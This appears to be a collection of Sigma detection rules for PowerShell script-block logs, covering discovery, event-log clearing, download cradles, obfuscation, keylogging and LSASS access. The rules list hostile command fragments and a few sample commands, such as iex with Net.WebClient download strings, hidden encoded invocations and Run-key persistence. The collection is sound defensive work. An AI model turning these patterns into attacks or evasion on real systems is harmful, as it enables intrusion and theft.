    "content": "title: Detected Windows Software Discovery - PowerShell\nid: 2650dd1a-eb2a-412d-ac36-83f06c4f2282\nstatus: test\ndescription: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md\n    - https://github.com/harleyQu1nn/AggressorScripts # AVQuery.cna\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-16\nmodified: 2022-12-02\ntags:\n    - attack.discovery\n    - attack.t1518\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            # Example: Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize\n            - 'get-itemProperty'\n            - '\\software\\'\n            - 'select-object'\n            - 'format-table'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml",
    "content": "title: Powershell Store File In Alternate Data Stream\nid: a699b30e-d010-46c8-bbd1-ee2e26765fe9\nstatus: test\ndescription: Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md\nauthor: frack113\ndate: 2021-09-02\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_compspec:\n        ScriptBlockText|contains|all:\n            - 'Start-Process'\n            - '-FilePath \"$env:comspec\" '\n            - '-ArgumentList '\n            - '>'\n    condition: selection_compspec\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml",
    "content": "title: Potential Persistence Via Security Descriptors - ScriptBlock\nid: 2f77047c-e6e9-4c11-b088-a3de399524cd\nstatus: test\ndescription: Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.\nreferences:\n    - https://github.com/HarmJ0y/DAMP\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-05\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'win32_Trustee'\n            - 'win32_Ace'\n            - '.AccessMask'\n            - '.AceType'\n            - '.SetSecurityDescriptor'\n        ScriptBlockText|contains:\n            - '\\Lsa\\JD'\n            - '\\Lsa\\Skew1'\n            - '\\Lsa\\Data'\n            - '\\Lsa\\GBG'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml",
    "content": "title: AD Groups Or Users Enumeration Using PowerShell - ScriptBlock\nid: 88f0884b-331d-403d-a3a1-b668cf035603\nstatus: test\ndescription: |\n    Adversaries may attempt to find domain-level groups and permission settings.\n    The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\n    Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md\nauthor: frack113\ndate: 2021-12-15\nmodified: 2022-12-25\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    test_2:\n        ScriptBlockText|contains: get-ADPrincipalGroupMembership\n    test_7:\n        ScriptBlockText|contains|all:\n            - get-aduser\n            - '-f '\n            - '-pr '\n            - DoesNotRequirePreAuth\n    condition: 1 of test_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml",
    "content": "title: Potential PowerShell Obfuscation Using Character Join\nid: e8314f79-564d-4f79-bc13-fbc0bf2660d8\nrelated:\n    - id: 96cd126d-f970-49c4-848a-da3a09f55c55\n      type: derived\nstatus: test\ndescription: Detects specific techniques often seen used inside of PowerShell scripts to obfuscate Alias creation\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1027\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        # Example:\n        #   Set-Alias -Name Y -Value (-join(\"Ne\",\"w-O\",\"bje\",\"ct\"))\n        #   Set-Alias -Name X -Value (-join(\"Inv\",\"oke\",\"-\",\"Exp\",\"ression\"))\n        ScriptBlockText|contains|all:\n            - '-Alias' # For both \"New-Alias\" and \"Set-Alias\"\n            - ' -Value (-join('\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml",
    "content": "title: Suspicious Eventlog Clear\nid: 0f017df3-8f5a-414f-ad6b-24aff1128278\nrelated:\n    - id: cc36992a-4671-4f21-a91d-6c2b72a2edf5\n      type: derived\nstatus: test\ndescription: Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the Windows event logs\nreferences:\n    - https://twitter.com/oroneequalsone/status/1568432028361830402\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html\n    - https://stackoverflow.com/questions/66011412/how-to-clear-a-event-log-in-powershell-7\n    - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventing.reader.eventlogsession.clearlog?view=windowsdesktop-9.0&viewFallbackFrom=dotnet-plat-ext-5.0#System_Diagnostics_Eventing_Reader_EventLogSession_ClearLog_System_String_\n    - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2022-09-12\nmodified: 2025-10-06\ntags:\n    - attack.defense-evasion\n    - attack.t1070.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        - ScriptBlockText|contains:\n              - 'Clear-EventLog '\n              - 'Remove-EventLog '\n              - 'Limit-EventLog '\n              - 'Clear-WinEvent '\n        - ScriptBlockText|contains|all:\n              - 'Eventing.Reader.EventLogSession' # [System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($_.LogName)\n              - 'ClearLog'\n        - ScriptBlockText|contains|all:\n              - 'Diagnostics.EventLog'\n              - 'Clear'\n    condition: selection\nfalsepositives:\n    - Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml",
    "content": "title: Powershell Directory Enumeration\nid: 162e69a7-7981-4344-84a9-0f1c9a217a52\nstatus: test\ndescription: Detects technique used by MAZE ransomware to enumerate directories using Powershell\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md\n    - https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents\nauthor: frack113\ndate: 2022-03-17\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - foreach\n            - Get-ChildItem\n            - '-Path '\n            - '-ErrorAction '\n            - SilentlyContinue\n            - 'Out-File '\n            - '-append'\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_download.yml",
    "content": "title: Suspicious PowerShell Download - Powershell Script\nid: 403c2cc0-7f6b-4925-9423-bfa573bed7eb\nrelated:\n    - id: 65531a81-a694-4e31-ae04-f8ba5bc33759\n      type: derived\nstatus: test\ndescription: Detects suspicious PowerShell download command\nreferences:\n    - https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0\n    - https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-05\nmodified: 2022-12-02\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    webclient:\n        ScriptBlockText|contains: 'System.Net.WebClient'\n    download:\n        ScriptBlockText|contains:\n            - '.DownloadFile('\n            - '.DownloadFileAsync('\n            - '.DownloadString('\n            - '.DownloadStringAsync('\n    condition: webclient and download\nfalsepositives:\n    - PowerShell scripts that download content from the Internet\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml",
    "content": "title: Powershell Execute Batch Script\nid: b5522a23-82da-44e5-9c8b-e10ed8955f88\nstatus: test\ndescription: |\n    Adversaries may abuse the Windows command shell for execution.\n    The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\n    The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\n    Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\n    Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script\nauthor: frack113\ndate: 2022-01-02\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_start:\n        ScriptBlockText|contains: Start-Process\n    selection_batch:\n        ScriptBlockText|contains:\n            - '.cmd'\n            - '.bat'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml",
    "content": "title: Extracting Information with PowerShell\nid: bd5971a7-626d-46ab-8176-ed643f694f68\nstatus: test\ndescription: |\n    Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\n    These can be files created by users to store their own credentials, shared credential stores for a group of individuals,\n    configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md\nauthor: frack113\ndate: 2021-12-19\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1552.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - ls\n            - ' -R'\n            - 'select-string '\n            - '-Pattern '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml",
    "content": "title: Troubleshooting Pack Cmdlet Execution\nid: 03409c93-a7c7-49ba-9a4c-a00badf2a153\nstatus: test\ndescription: Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)\nreferences:\n    - https://twitter.com/nas_bench/status/1537919885031772161\n    - https://lolbas-project.github.io/lolbas/Binaries/Msdt/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-21\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Invoke-TroubleshootingPack'\n            - 'C:\\Windows\\Diagnostics\\System\\PCW'\n            - '-AnswerFile'\n            - '-Unattended'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml",
    "content": "title: Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy\nid: bbb9495b-58fc-4016-b9df-9a3a1b67ca82\nstatus: test\ndescription: Detects PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy\n    - https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps\nauthor: frack113\ndate: 2022-03-17\ntags:\n    - attack.discovery\n    - attack.t1201\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: Get-AdDefaultDomainPasswordPolicy\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml",
    "content": "title: Suspicious PowerShell Get Current User\nid: 4096a49c-7de4-4da0-a230-c66ccd56ea5a\nstatus: test\ndescription: Detects the use of PowerShell to identify the current logged user.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script\nauthor: frack113\ndate: 2022-04-04\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - '[System.Environment]::UserName'\n            - '$env:UserName'\n            - '[System.Security.Principal.WindowsIdentity]::GetCurrent()'\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml",
    "content": "title: Suspicious GPO Discovery With Get-GPO\nid: eb2fd349-ec67-4caa-9143-d79c7fb34441\nstatus: test\ndescription: Detect use of Get-GPO to get one GPO or all the GPOs in a domain.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md\n    - https://learn.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps\nauthor: frack113\ndate: 2022-06-04\ntags:\n    - attack.discovery\n    - attack.t1615\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: Get-GPO\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml",
    "content": "title: Suspicious Process Discovery With Get-Process\nid: af4c87ce-bdda-4215-b998-15220772e993\nstatus: test\ndescription: Get the processes that are running on the local computer.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7.4\nauthor: frack113\ndate: 2022-03-17\ntags:\n    - attack.discovery\n    - attack.t1057\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: Get-Process\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml",
    "content": "title: PowerShell Get-Process LSASS in ScriptBlock\nid: 84c174ab-d3ef-481f-9c86-a50d0b8e3edb\nstatus: test\ndescription: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity\nreferences:\n    - https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-04-23\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'Get-Process lsass'\n    condition: selection\nfalsepositives:\n    - Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml",
    "content": "title: Suspicious GetTypeFromCLSID ShellExecute\nid: 8bc063d5-3a3a-4f01-a140-bc15e55e8437\nstatus: test\ndescription: Detects suspicious Powershell code that executes COM Objects\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object\nauthor: frack113\ndate: 2022-04-02\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - '::GetTypeFromCLSID('\n            - '.ShellExecute('\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml",
    "content": "title: Suspicious Hyper-V Cmdlets\nid: 42d36aa1-3240-4db0-8257-e0118dcdd9cd\nstatus: test\ndescription: Adversaries may carry out malicious operations using a virtual instance to avoid detection\nreferences:\n    - https://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine\nauthor: frack113\ndate: 2022-04-09\ntags:\n    - attack.defense-evasion\n    - attack.t1564.006\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - New-VM\n            - Set-VMFirmware\n            - Start-VM\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml",
    "content": "title: Suspicious PowerShell Invocations - Generic\nid: ed965133-513f-41d9-a441-e38076a0798f\nrelated:\n    - id: 3d304fda-78aa-43ed-975c-d740798a49c1\n      type: derived\n    - id: bbb80e91-5746-4fbe-8898-122e2cafdbf4\n      type: similar\nstatus: test\ndescription: Detects suspicious PowerShell invocation command parameters\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-12\nmodified: 2023-01-03\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_encoded:\n        ScriptBlockText|contains:\n            - ' -enc '\n            - ' -EncodedCommand '\n            - ' -ec '\n    selection_hidden:\n        ScriptBlockText|contains:\n            - ' -w hidden '\n            - ' -window hidden '\n            - ' -windowstyle hidden '\n            - ' -w 1 '\n    selection_noninteractive:\n        ScriptBlockText|contains:\n            - ' -noni '\n            - ' -noninteractive '\n    condition: all of selection*\nfalsepositives:\n    - Very special / sneaky PowerShell scripts\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml",
    "content": "title: Suspicious PowerShell Invocations - Specific\nid: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71\nrelated:\n    - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c\n      type: obsolete\n    - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090\n      type: similar\n    - id: 536e2947-3729-478c-9903-745aaffe60d2\n      type: similar\nstatus: test\ndescription: Detects suspicious PowerShell invocation command parameters\nreferences:\n    - Internal Research\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro\ndate: 2017-03-05\nmodified: 2025-02-17\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_convert_b64:\n        ScriptBlockText|contains|all:\n            - '-nop'\n            - ' -w '\n            - 'hidden'\n            - ' -c '\n            - '[Convert]::FromBase64String'\n    selection_iex_selection:\n        ScriptBlockText|contains|all:\n            - ' -w '\n            - 'hidden'\n            - '-noni'\n            - '-nop'\n            - ' -c '\n            - 'iex'\n            - 'New-Object'\n    selection_enc_selection:\n        ScriptBlockText|contains|all:\n            - ' -w '\n            - 'hidden'\n            - '-ep'\n            - 'bypass'\n            - '-Enc'\n    selection_reg_selection:\n        ScriptBlockText|contains|all:\n            - 'powershell'\n            - 'reg'\n            - 'add'\n        ScriptBlockText|contains:\n            - '\\software\\microsoft\\windows\\currentversion\\run'\n            - '\\software\\wow6432node\\microsoft\\windows\\currentversion\\run'\n            - '\\software\\microsoft\\windows\\currentversion\\policies\\explorer\\run'\n    selection_webclient_selection:\n        ScriptBlockText|contains|all:\n            - 'bypass'\n            - '-noprofile'\n            - '-windowstyle'\n            - 'hidden'\n            - 'new-object'\n            - 'system.net.webclient'\n            - '.download'\n    selection_iex_webclient:\n        ScriptBlockText|contains|all:\n            - 'iex'\n            - 'New-Object'\n            - 'Net.WebClient'\n            - '.Download'\n    filter_chocolatey:\n        ScriptBlockText|contains:\n            - \"(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1\"\n            - \"(New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')\"\n            - 'Write-ChocolateyWarning'\n    condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml",
    "content": "title: Change User Agents with WebRequest\nid: d4488827-73af-4f8d-9244-7b7662ef046e\nstatus: test\ndescription: |\n    Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\n    Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols\nauthor: frack113\ndate: 2022-01-23\nmodified: 2025-07-18\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_webrequest:\n        ScriptBlockText|contains:\n            - 'Invoke-WebRequest'\n            - 'Invoke-RestMethod'\n            - ' irm ' # Space before and after to avoid false positives with 'irm' as a variable\n            - 'iwr '\n    selection_useragent:\n        ScriptBlockText|contains: '-UserAgent '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml",
    "content": "title: Suspicious IO.FileStream\nid: 70ad982f-67c8-40e0-a955-b920c2fa05cb\nstatus: test\ndescription: Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md\nauthor: frack113\ndate: 2022-01-09\nmodified: 2022-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - New-Object\n            - IO.FileStream\n            - '\\\\\\\\.\\\\'\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml",
    "content": "title: Potential Keylogger Activity\nid: 965e2db9-eddb-4cf6-a986-7a967df651e4\nstatus: test\ndescription: Detects PowerShell scripts that contain references to keystroke capturing functions\nreferences:\n    - https://twitter.com/ScumBots/status/1610626724257046529\n    - https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content\n    - https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content\n    - https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-04\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1056.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: '[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml",
    "content": "title: Potential Suspicious PowerShell Keywords\nid: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf\nstatus: test\ndescription: Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework\nreferences:\n    - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462\n    - https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1\n    - https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1\n    - https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7\nauthor: Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)\ndate: 2019-02-11\nmodified: 2023-04-21\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'System.Reflection.Assembly.Load($'\n            - '[System.Reflection.Assembly]::Load($'\n            - '[Reflection.Assembly]::Load($'\n            - 'System.Reflection.AssemblyName'\n            - 'Reflection.Emit.AssemblyBuilderAccess'\n            - 'Reflection.Emit.CustomAttributeBuilder'\n            - 'Runtime.InteropServices.UnmanagedType'\n            - 'Runtime.InteropServices.DllImportAttribute'\n            - 'SuspendThread'\n            - 'rundll32'\n            # - 'FromBase64'\n            # - 'Invoke-WMIMethod' # Prone to FP\n            # - 'http://127.0.0.1' # Prone to FP\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml",
    "content": "title: Suspicious Get Local Groups Information - PowerShell\nid: fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb\nrelated:\n    - id: cef24b90-dddc-4ae1-a09a-8764872f69fc\n      type: similar\nstatus: test\ndescription: |\n    Detects the use of PowerShell modules and cmdlets to gather local group information.\n    Adversaries may use local system permission groups to determine which groups exist and which users belong to a particular group such as the local administrators group.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md\nauthor: frack113\ndate: 2021-12-12\nmodified: 2025-08-22\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_localgroup:\n        ScriptBlockText|contains:\n            - 'get-localgroup '\n            - 'get-localgroupmember '\n    selection_wmi_module:\n        ScriptBlockText|contains:\n            - 'get-wmiobject '\n            - 'gwmi '\n            - 'get-ciminstance '\n            - 'gcim '\n    selection_wmi_class:\n        ScriptBlockText|contains: 'win32_group' # Covers both win32_group and win32_groupuser\n    condition: selection_localgroup or all of selection_wmi_*\nfalsepositives:\n    - Inventory scripts or admin 